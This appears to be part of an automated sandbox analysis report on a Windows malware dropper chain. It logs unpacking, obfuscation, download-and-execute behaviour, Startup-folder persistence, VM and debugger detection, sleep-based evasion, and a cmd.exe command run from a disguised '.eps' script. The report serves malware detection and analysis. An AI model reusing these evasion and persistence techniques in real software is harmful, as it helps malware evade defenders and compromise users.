Source: C:\Users\user\AppData\Local\Temp\New Feature\vpn.exe Process created: C:\Windows\SysWOW64\makecab.exe 'C:\Windows\System32\makecab.exe'
Source: C:\Users\user\AppData\Local\Temp\New Feature\vpn.exe Process created: C:\Windows\SysWOW64\makecab.exe 'C:\Windows\System32\makecab.exe'
Source: C:\Users\user\AppData\Local\Temp\New Feature\vpn.exe Process created: C:\Windows\SysWOW64\makecab.exe 'C:\Windows\System32\makecab.exe'
Source: C:\Users\user\AppData\Local\Temp\New Feature\vpn.exe Process created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\System32\cmd.exe' /c C:\Windows\System32\cmd.exe < Scoprirvi.eps
Source: C:\Windows\SysWOW64\cmd.exe Process created: unknown unknown
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.24453.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{515980c3-57fe-4c1e-a561-730dd256ab98}\InprocServer32
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.24453.exe File opened: C:\Windows\SysWOW64\msvcr100.dll

Data Obfuscation:

Detected unpacking (changes PE section rights)
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.24453.exe Unpacked PE file: 0.2.SecuriteInfo.com.W32.AIDetect.malware1.24453.exe.400000.0.unpack .text:ER;.data:W;.hejus:W;.tiyovo:W;.new:R;.rsrc:R;.reloc:R; vs .text:ER;.rdata:R;.data:W;.rsrc:R;.reloc:R;
Source: C:\Users\user\AppData\Local\Temp\New Feature\4.exe Unpacked PE file: 16.2.4.exe.400000.0.unpack .text:ER;.data:W;.yiku:W;.padozoc:W;.new:R;.rsrc:R;.reloc:R; vs .text:ER;.rdata:R;.data:W;.rsrc:R;.reloc:R;
Source: C:\Users\user\AppData\Roaming\Smart Clock\SmartClock.exe Unpacked PE file: 22.2.SmartClock.exe.400000.0.unpack .text:ER;.data:W;.yiku:W;.padozoc:W;.new:R;.rsrc:R;.reloc:R; vs .text:ER;.rdata:R;.data:W;.rsrc:R;.reloc:R;
Source: C:\Users\user\AppData\Roaming\Smart Clock\SmartClock.exe Unpacked PE file: 25.2.SmartClock.exe.400000.0.unpack .text:ER;.data:W;.yiku:W;.padozoc:W;.new:R;.rsrc:R;.reloc:R; vs .text:ER;.rdata:R;.data:W;.rsrc:R;.reloc:R;
Source: C:\Users\user\AppData\Roaming\Smart Clock\SmartClock.exe Unpacked PE file: 33.2.SmartClock.exe.400000.0.unpack .text:ER;.data:W;.yiku:W;.padozoc:W;.new:R;.rsrc:R;.reloc:R; vs .text:ER;.rdata:R;.data:W;.rsrc:R;.reloc:R;
Detected unpacking (overwrites its own PE header)
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.24453.exe Unpacked PE file: 0.2.SecuriteInfo.com.W32.AIDetect.malware1.24453.exe.400000.0.unpack
Source: C:\Users\user\AppData\Local\Temp\New Feature\4.exe Unpacked PE file: 16.2.4.exe.400000.0.unpack
Source: C:\Users\user\AppData\Roaming\Smart Clock\SmartClock.exe Unpacked PE file: 22.2.SmartClock.exe.400000.0.unpack
Source: C:\Users\user\AppData\Roaming\Smart Clock\SmartClock.exe Unpacked PE file: 25.2.SmartClock.exe.400000.0.unpack
Source: C:\Users\user\AppData\Roaming\Smart Clock\SmartClock.exe Unpacked PE file: 33.2.SmartClock.exe.400000.0.unpack
Contains functionality to dynamically determine API calls
Source: C:\Users\user\AppData\Local\Temp\Murano.exe Code function: 13_2_00406328 GetModuleHandleA,LoadLibraryA,GetProcAddress, 13_2_00406328
PE file contains an invalid checksum
Source: vpn.exe.13.dr Static PE information: real checksum: 0x11b384 should be: 0x11fc4a
Source: UAC.dll.13.dr Static PE information: real checksum: 0x0 should be: 0xde12
PE file contains sections with non-standard names
Source: SecuriteInfo.com.W32.AIDetect.malware1.24453.exe Static PE information: section name: .hejus
Source: SecuriteInfo.com.W32.AIDetect.malware1.24453.exe Static PE information: section name: .tiyovo
Source: SecuriteInfo.com.W32.AIDetect.malware1.24453.exe Static PE information: section name: .new
Source: 4.exe.13.dr Static PE information: section name: .yiku
Source: 4.exe.13.dr Static PE information: section name: .padozoc
Source: 4.exe.13.dr Static PE information: section name: .new
Source: SmartClock.exe.16.dr Static PE information: section name: .yiku
Source: SmartClock.exe.16.dr Static PE information: section name: .padozoc
Source: SmartClock.exe.16.dr Static PE information: section name: .new
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\user\AppData\Local\Temp\New Feature\4.exe Code function: 16_2_0041D1BC push eax; retn 0041h 16_2_0041D1E1
Source: C:\Users\user\AppData\Local\Temp\New Feature\4.exe Code function: 16_2_0041CA40 pushad ; retn 0041h 16_2_0041CBB9
Source: C:\Users\user\AppData\Local\Temp\New Feature\4.exe Code function: 16_2_0041BB1C pushad ; retn 0041h 16_2_0041BB45
Source: C:\Users\user\AppData\Local\Temp\New Feature\4.exe Code function: 16_2_0040A446 push ecx; ret 16_2_0040A459
Source: C:\Users\user\AppData\Local\Temp\New Feature\4.exe Code function: 16_2_004075A2 push eax; mov dword ptr [esp], ecx 16_2_004075A7
Source: C:\Users\user\AppData\Local\Temp\New Feature\4.exe Code function: 16_2_03F577F2 push eax; mov dword ptr [esp], ecx 16_2_03F577F7
Source: C:\Users\user\AppData\Local\Temp\New Feature\4.exe Code function: 16_2_03F6B76C pushad ; retn 0041h 16_2_03F6B795
Source: C:\Users\user\AppData\Local\Temp\New Feature\4.exe Code function: 16_2_03F5A696 push ecx; ret 16_2_03F5A6A9
Source: C:\Users\user\AppData\Local\Temp\New Feature\4.exe Code function: 16_2_03F6C690 pushad ; retn 0041h 16_2_03F6C809
Source: C:\Users\user\AppData\Local\Temp\New Feature\4.exe Code function: 16_2_03F6CE0C push eax; retn 0041h 16_2_03F6CE31
Source: C:\Users\user\AppData\Local\Temp\New Feature\vpn.exe Code function: 18_2_004186D0 push eax; ret 18_2_004186FE
Source: C:\Users\user\AppData\Roaming\Smart Clock\SmartClock.exe Code function: 22_2_0041D1BC push eax; retn 0041h 22_2_0041D1E1
Source: C:\Users\user\AppData\Roaming\Smart Clock\SmartClock.exe Code function: 22_2_0041CA40 pushad ; retn 0041h 22_2_0041CBB9
Source: C:\Users\user\AppData\Roaming\Smart Clock\SmartClock.exe Code function: 22_2_0041BB1C pushad ; retn 0041h 22_2_0041BB45
Source: C:\Users\user\AppData\Roaming\Smart Clock\SmartClock.exe Code function: 22_2_0040A446 push ecx; ret 22_2_0040A459
Source: C:\Users\user\AppData\Roaming\Smart Clock\SmartClock.exe Code function: 22_2_004075A2 push eax; mov dword ptr [esp], ecx 22_2_004075A7
Source: C:\Users\user\AppData\Roaming\Smart Clock\SmartClock.exe Code function: 22_2_05A077F2 push eax; mov dword ptr [esp], ecx 22_2_05A077F7
Source: C:\Users\user\AppData\Roaming\Smart Clock\SmartClock.exe Code function: 22_2_05A1B76C pushad ; retn 0041h 22_2_05A1B795
Source: C:\Users\user\AppData\Roaming\Smart Clock\SmartClock.exe Code function: 22_2_05A1C690 pushad ; retn 0041h 22_2_05A1C809
Source: C:\Users\user\AppData\Roaming\Smart Clock\SmartClock.exe Code function: 22_2_05A0A696 push ecx; ret 22_2_05A0A6A9
Source: C:\Users\user\AppData\Roaming\Smart Clock\SmartClock.exe Code function: 22_2_05A1CE0C push eax; retn 0041h 22_2_05A1CE31
Source: C:\Users\user\AppData\Roaming\Smart Clock\SmartClock.exe Code function: 25_2_0041D1BC push eax; retn 0041h 25_2_0041D1E1
Source: C:\Users\user\AppData\Roaming\Smart Clock\SmartClock.exe Code function: 25_2_0041CA40 pushad ; retn 0041h 25_2_0041CBB9
Source: C:\Users\user\AppData\Roaming\Smart Clock\SmartClock.exe Code function: 25_2_0041BB1C pushad ; retn 0041h 25_2_0041BB45
Source: C:\Users\user\AppData\Roaming\Smart Clock\SmartClock.exe Code function: 25_2_0040A446 push ecx; ret 25_2_0040A459
Source: C:\Users\user\AppData\Roaming\Smart Clock\SmartClock.exe Code function: 25_2_004075A2 push eax; mov dword ptr [esp], ecx 25_2_004075A7
Source: C:\Users\user\AppData\Roaming\Smart Clock\SmartClock.exe Code function: 25_2_059D77F2 push eax; mov dword ptr [esp], ecx 25_2_059D77F7
Source: C:\Users\user\AppData\Roaming\Smart Clock\SmartClock.exe Code function: 25_2_059EB76C pushad ; retn 0041h 25_2_059EB795
Source: C:\Users\user\AppData\Roaming\Smart Clock\SmartClock.exe Code function: 25_2_059DA696 push ecx; ret 25_2_059DA6A9
Source: C:\Users\user\AppData\Roaming\Smart Clock\SmartClock.exe Code function: 25_2_059EC690 pushad ; retn 0041h 25_2_059EC809
Source: C:\Users\user\AppData\Roaming\Smart Clock\SmartClock.exe Code function: 25_2_059ECE0C push eax; retn 0041h 25_2_059ECE31
Source: initial sample Static PE information: section name: .text entropy: 7.87132737384
Source: initial sample Static PE information: section name: .text entropy: 7.34669656033
Source: initial sample Static PE information: section name: .text entropy: 7.34669656033

Persistence and Installation Behavior:

Contains functionality to download and launch executables
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.24453.exe Code function: 0_2_0040C561 Sleep,Sleep,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,GetFileAttributesW,ExitProcess,CreateDirectoryW,CreateDirectoryW,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,CreateDirectoryW,CreateDirectoryW,CreateDirectoryW,CreateDirectoryW,CreateDirectoryW,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,CreateDirectoryW,CreateDirectoryW,CreateDirectoryW,CreateDirectoryW,Sleep,ExpandEnvironmentStringsW,DeleteFileW,Sleep,URLDownloadToFileW,Sleep,ShellExecuteW,ExitProcess, 0_2_0040C561
Drops PE files
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.24453.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\B87Z87FM\lv[1].exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\Murano.exe File created: C:\Users\user\AppData\Local\Temp\nsg8FBB.tmp\UAC.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\Murano.exe File created: C:\Users\user\AppData\Local\Temp\New Feature\vpn.exe Jump to dropped file
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.24453.exe File created: C:\Users\user\AppData\Local\Temp\Murano.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\New Feature\4.exe File created: C:\Users\user\AppData\Roaming\Smart Clock\SmartClock.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\Murano.exe File created: C:\Users\user\AppData\Local\Temp\New Feature\4.exe Jump to dropped file
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.24453.exe Code function: 0_2_00409DF0 ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,GetPrivateProfileStringW,CreateFileW,CreateFileW,CloseHandle,CloseHandle,CreateFileW,CloseHandle,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,CopyFileW,CopyFileW,CopyFileW,GetFileAttributesW,GetFileAttributesW,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,WideCharToMultiByte,WideCharToMultiByte,WideCharToMultiByte,WideCharToMultiByte,WideCharToMultiByte,WideCharToMultiByte,WideCharToMultiByte,WideCharToMultiByte,UnmapViewOfFile,CloseHandle,CloseHandle,CloseHandle,GetFileAttributesW,WideCharToMultiByte,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,WideCharToMultiByte,WideCharToMultiByte,WideCharToMultiByte,WideCharToMultiByte,WideCharToMultiByte,WideCharToMultiByte,WideCharToMultiByte,WideCharToMultiByte,WideCharToMultiByte,WideCharToMultiByte, 0_2_00409DF0

Boot Survival:

Creates a start menu entry (Start Menu\Programs\Startup)
Source: C:\Users\user\AppData\Local\Temp\New Feature\4.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SmartClock.lnk Jump to behavior
Stores files to the Windows start menu directory
Source: C:\Users\user\AppData\Local\Temp\New Feature\4.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SmartClock.lnk Jump to behavior

Hooking and other Techniques for Hiding and Protection:

Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.24453.exe Registry key monitored for changes: HKEY_CURRENT_USER_Classes Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.24453.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.24453.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Murano.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\New Feature\vpn.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\New Feature\vpn.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\New Feature\vpn.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\New Feature\vpn.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\New Feature\vpn.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\New Feature\vpn.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\New Feature\vpn.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\New Feature\vpn.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\New Feature\vpn.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\New Feature\vpn.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\New Feature\vpn.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\New Feature\vpn.exe Process information set: NOOPENFILEERRORBOX Jump to behavior

Malware Analysis System Evasion:

Delayed program exit found
Source: C:\Users\user\AppData\Local\Temp\New Feature\4.exe Code function: 16_2_004011E2 Sleep,ExitProcess, 16_2_004011E2
Source: C:\Users\user\AppData\Local\Temp\New Feature\4.exe Code function: 16_2_03F51432 Sleep,ExitProcess, 16_2_03F51432
Source: C:\Users\user\AppData\Roaming\Smart Clock\SmartClock.exe Code function: 22_2_004011E2 Sleep,ExitProcess, 22_2_004011E2
Source: C:\Users\user\AppData\Roaming\Smart Clock\SmartClock.exe Code function: 22_2_05A01432 Sleep,ExitProcess, 22_2_05A01432
Source: C:\Users\user\AppData\Roaming\Smart Clock\SmartClock.exe Code function: 25_2_004011E2 Sleep,ExitProcess, 25_2_004011E2
Source: C:\Users\user\AppData\Roaming\Smart Clock\SmartClock.exe Code function: 25_2_059D1432 Sleep,ExitProcess, 25_2_059D1432
Contains capabilities to detect virtual machines
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.24453.exe Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\New Feature\vpn.exe File opened / queried: SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b} Jump to behavior
Contains long sleeps (>= 3 min)
Source: C:\Users\user\AppData\Roaming\Smart Clock\SmartClock.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Is looking for software installed on the system
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.24453.exe Registry key enumerated: More than 346 enums for key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.24453.exe TID: 5856 Thread sleep time: -102511s >= -30000s Jump to behavior
Source: C:\Windows\System32\conhost.exe TID: 1400 Thread sleep count: 40 > 30 Jump to behavior
Source: C:\Users\user\AppData\Roaming\Smart Clock\SmartClock.exe TID: 3152 Thread sleep time: -922337203685477s >= -30000s Jump to behavior
Source: C:\Windows\System32\conhost.exe TID: 2896 Thread sleep count: 34 > 30
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Users\user\AppData\Roaming\Smart Clock\SmartClock.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.24453.exe Code function: 0_2_0040F1D0 FindFirstFileW,FindNextFileW,FindClose, 0_2_0040F1D0
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.24453.exe Code function: 0_2_00414650 ExpandEnvironmentStringsW,FindFirstFileW,FindFirstFileW,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,CreateDirectoryW,CreateDirectoryW,CreateDirectoryW,CreateDirectoryW,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW, 0_2_00414650
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.24453.exe Code function: 0_2_0041469B FindFirstFileW,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,CopyFileW,ExpandEnvironmentStringsW,FindNextFileW,FindClose,FindFirstFileW,FindNextFileW,FindClose, 0_2_0041469B
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.24453.exe Code function: 0_2_00416AC0 FindFirstFileW,FindFirstFileW, 0_2_00416AC0
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.24453.exe Code function: 0_2_00416C3A CopyFileW,ExpandEnvironmentStringsW,FindNextFileW,FindClose,FindFirstFileW,FindNextFileW,FindClose, 0_2_00416C3A
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.24453.exe Code function: 0_2_0040F259 FindFirstFileW,FindNextFileW,FindClose, 0_2_0040F259
Source: C:\Users\user\AppData\Local\Temp\Murano.exe Code function: 13_2_00406301 FindFirstFileW,FindClose, 13_2_00406301
Source: C:\Users\user\AppData\Local\Temp\Murano.exe Code function: 13_2_00406CC7 DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW, 13_2_00406CC7
Source: C:\Users\user\AppData\Local\Temp\New Feature\4.exe Code function: 16_2_0040F64C FindFirstFileExW, 16_2_0040F64C
Source: C:\Users\user\AppData\Local\Temp\New Feature\4.exe Code function: 16_2_03F5F89C FindFirstFileExW, 16_2_03F5F89C
Source: C:\Users\user\AppData\Local\Temp\New Feature\vpn.exe Code function: 18_2_00403117 FindFirstFileW,FindClose,SetLastError,CompareFileTime, 18_2_00403117
Source: C:\Users\user\AppData\Local\Temp\New Feature\vpn.exe Code function: 18_2_00408FA7 ??2@YAPAXI@Z,FindFirstFileW,FindClose, 18_2_00408FA7
Source: C:\Users\user\AppData\Local\Temp\New Feature\vpn.exe Code function: 18_2_00402A0B FindFirstFileW,SetFileAttributesW,lstrcmpW,lstrcmpW,lstrcmpW,SetFileAttributesW,DeleteFileW,FindNextFileW,FindClose,SetCurrentDirectoryW,SetFileAttributesW,RemoveDirectoryW,??3@YAXPAX@Z,??3@YAXPAX@Z, 18_2_00402A0B
Source: C:\Users\user\AppData\Local\Temp\New Feature\vpn.exe Code function: 18_2_00402B28 FindFirstFileW,FindClose,SetFileAttributesW,DeleteFileW, 18_2_00402B28
Source: C:\Users\user\AppData\Roaming\Smart Clock\SmartClock.exe Code function: 22_2_0040F64C FindFirstFileExW, 22_2_0040F64C
Source: C:\Users\user\AppData\Roaming\Smart Clock\SmartClock.exe Code function: 22_2_05A0F89C FindFirstFileExW, 22_2_05A0F89C
Source: C:\Users\user\AppData\Roaming\Smart Clock\SmartClock.exe Code function: 25_2_0040F64C FindFirstFileExW, 25_2_0040F64C
Source: C:\Users\user\AppData\Roaming\Smart Clock\SmartClock.exe Code function: 25_2_059DF89C FindFirstFileExW, 25_2_059DF89C
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.24453.exe Code function: 0_2_0041A280 ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,Sleep,ExpandEnvironmentStringsW,Sleep,GetFileAttributesW,GetFileAttributesW,Sleep,ExpandEnvironmentStringsW,GetFileAttributesW,Sleep,GetSystemInfo,KiUserCallbackDispatcher,GlobalMemoryStatusEx,RegOpenKeyExW,RegQueryValueExW,RegCloseKey,Sleep,ExitProcess, 0_2_0041A280
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.24453.exe Thread delayed: delay time: 102511 Jump to behavior
Source: C:\Users\user\AppData\Roaming\Smart Clock\SmartClock.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.24453.exe File opened: C:\Users\user Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.24453.exe File opened: C:\Users\user\AppData\Local\Temp Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.24453.exe File opened: C:\Users\user\AppData\Local\Temp\UdRFIiqEaRrk\files_ Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.24453.exe File opened: C:\Users\user\AppData\Local\Temp\UdRFIiqEaRrk Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.24453.exe File opened: C:\Users\user\AppData Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.24453.exe File opened: C:\Users\user\AppData\Local Jump to behavior
Source: SecuriteInfo.com.W32.AIDetect.malware1.24453.exe, 00000000.00000002.383766722.0000000005C63000.00000004.00000001.sdmp Binary or memory string: Hyper-V RAW

Anti Debugging:

Contains functionality to check if a debugger is running (IsDebuggerPresent)
Source: C:\Users\user\AppData\Local\Temp\New Feature\4.exe Code function: 16_2_0040A1A9 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 16_2_0040A1A9
Contains functionality to dynamically determine API calls
Source: C:\Users\user\AppData\Local\Temp\Murano.exe Code function: 13_2_00406328 GetModuleHandleA,LoadLibraryA,GetProcAddress, 13_2_00406328
Contains functionality to read the PEB
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.24453.exe Code function: 0_2_004AF241 mov eax, dword ptr fs:[00000030h] 0_2_004AF241
Source: C:\Users\user\AppData\Local\Temp\New Feature\4.exe Code function: 16_2_0040E0E2 mov eax, dword ptr fs:[00000030h] 16_2_0040E0E2
Source: C:\Users\user\AppData\Local\Temp\New Feature\4.exe Code function: 16_2_004106D5 mov eax, dword ptr fs:[00000030h] 16_2_004106D5
Source: C:\Users\user\AppData\Local\Temp\New Feature\4.exe Code function: 16_2_03F5092B mov eax, dword ptr fs:[00000030h] 16_2_03F5092B
Source: C:\Users\user\AppData\Local\Temp\New Feature\4.exe Code function: 16_2_03F5E332 mov eax, dword ptr fs:[00000030h] 16_2_03F5E332
Source: C:\Users\user\AppData\Local\Temp\New Feature\4.exe Code function: 16_2_03F60925 mov eax, dword ptr fs:[00000030h] 16_2_03F60925
Source: C:\Users\user\AppData\Local\Temp\New Feature\4.exe Code function: 16_2_03F50D90 mov eax, dword ptr fs:[00000030h] 16_2_03F50D90
Source: C:\Users\user\AppData\Roaming\Smart Clock\SmartClock.exe Code function: 22_2_0040E0E2 mov eax, dword ptr fs:[00000030h] 22_2_0040E0E2
Source: C:\Users\user\AppData\Roaming\Smart Clock\SmartClock.exe Code function: 22_2_004106D5 mov eax, dword ptr fs:[00000030h] 22_2_004106D5
Source: C:\Users\user\AppData\Roaming\Smart Clock\SmartClock.exe Code function: 22_2_05A00D90 mov eax, dword ptr fs:[00000030h] 22_2_05A00D90
Source: C:\Users\user\AppData\Roaming\Smart Clock\SmartClock.exe Code function: 22_2_05A10925 mov eax, dword ptr fs:[00000030h] 22_2_05A10925
Source: C:\Users\user\AppData\Roaming\Smart Clock\SmartClock.exe Code function: 22_2_05A0092B mov eax, dword ptr fs:[00000030h] 22_2_05A0092B
Source: C:\Users\user\AppData\Roaming\Smart Clock\SmartClock.exe Code function: 22_2_05A0E332 mov eax, dword ptr fs:[00000030h] 22_2_05A0E332
Source: C:\Users\user\AppData\Roaming\Smart Clock\SmartClock.exe Code function: 25_2_0040E0E2 mov eax, dword ptr fs:[00000030h] 25_2_0040E0E2
Source: C:\Users\user\AppData\Roaming\Smart Clock\SmartClock.exe Code function: 25_2_004106D5 mov eax, dword ptr fs:[00000030h] 25_2_004106D5
Source: C:\Users\user\AppData\Roaming\Smart Clock\SmartClock.exe Code function: 25_2_059D092B mov eax, dword ptr fs:[00000030h] 25_2_059D092B
Source: C:\Users\user\AppData\Roaming\Smart Clock\SmartClock.exe Code function: 25_2_059D0D90 mov eax, dword ptr fs:[00000030h] 25_2_059D0D90
Source: C:\Users\user\AppData\Roaming\Smart Clock\SmartClock.exe Code function: 25_2_059E0925 mov eax, dword ptr fs:[00000030h] 25_2_059E0925
Source: C:\Users\user\AppData\Roaming\Smart Clock\SmartClock.exe Code function: 25_2_059DE332 mov eax, dword ptr fs:[00000030h] 25_2_059DE332
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Source: C:\Users\user\AppData\Local\Temp\New Feature\4.exe Code function: 16_2_0041178C GetProcessHeap, 16_2_0041178C
Source: C:\Users\user\AppData\Local\Temp\New Feature\4.exe Code function: 16_2_0040A1A9 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 16_2_0040A1A9
Source: C:\Users\user\AppData\Local\Temp\New Feature\4.exe Code function: 16_2_0040A33C SetUnhandledExceptionFilter, 16_2_0040A33C
Source: C:\Users\user\AppData\Local\Temp\New Feature\4.exe Code function: 16_2_0040D33E IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 16_2_0040D33E
Source: C:\Users\user\AppData\Local\Temp\New Feature\4.exe Code function: 16_2_0040A638 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 16_2_0040A638
Source: C:\Users\user\AppData\Local\Temp\New Feature\4.exe Code function: 16_2_03F5A3F9 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 16_2_03F5A3F9
Source: C:\Users\user\AppData\Local\Temp\New Feature\4.exe Code function: 16_2_03F5A888 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 16_2_03F5A888
Source: C:\Users\user\AppData\Local\Temp\New Feature\4.exe Code function: 16_2_03F5A58C SetUnhandledExceptionFilter, 16_2_03F5A58C
Source: C:\Users\user\AppData\Local\Temp\New Feature\4.exe Code function: 16_2_03F5D58E IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 16_2_03F5D58E
Source: C:\Users\user\AppData\Roaming\Smart Clock\SmartClock.exe Code function: 22_2_0040A1A9 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 22_2_0040A1A9
Source: C:\Users\user\AppData\Roaming\Smart Clock\SmartClock.exe Code function: 22_2_0040A33C SetUnhandledExceptionFilter, 22_2_0040A33C
